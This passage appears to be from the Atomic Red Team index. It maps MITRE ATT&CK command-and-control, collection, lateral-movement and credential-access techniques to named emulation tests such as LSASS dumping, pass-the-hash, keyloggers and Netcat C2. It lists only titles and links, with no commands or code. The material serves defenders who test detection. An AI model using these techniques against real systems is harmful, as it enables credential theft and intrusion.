- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #27: Linux Download File and Run [linux]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
- Atomic Test #1: Office365 - Email Forwarding [office-365]
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #1: Azure - Search Azure AD User Attributes for Passwords [azure-ad]
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
  - Atomic Test #5: Windows Internal pktmon capture [windows]
  - Atomic Test #6: Windows Internal pktmon set filter [windows]
  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
  - Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
  - Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
  - Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
  - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
  - Atomic Test #1: Enumeration for Credentials in Registry [windows]
  - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
  - Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
  - Atomic Test #1: Rubeus asreproast [windows]
  - Atomic Test #2: Get-DomainUser with PowerView [windows]
  - Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
  - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
  - Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
  - Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
  - Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
  - Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
  - Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #1: Run Chrome-password Collector [windows]
  - Atomic Test #2: Search macOS Safari Cookies [macos]
  - Atomic Test #3: LaZagne - Credentials from Browser [windows]
  - Atomic Test #4: Simulating access to Chrome Login Data [windows]
  - Atomic Test #5: Simulating access to Opera Login Data [windows]
  - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
  - Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
  - Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
  - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
  - Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
  - Atomic Test #11: WinPwn - BrowserPwn [windows]
  - Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
  - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
  - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
  - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
  - Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
  - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
  - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
  - Atomic Test #8: CertUtil ExportPFX [windows]
  - Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
  - Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
  - Atomic Test #11: Export Certificates with Mimikatz [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
  - Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
  - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
  - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
  - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
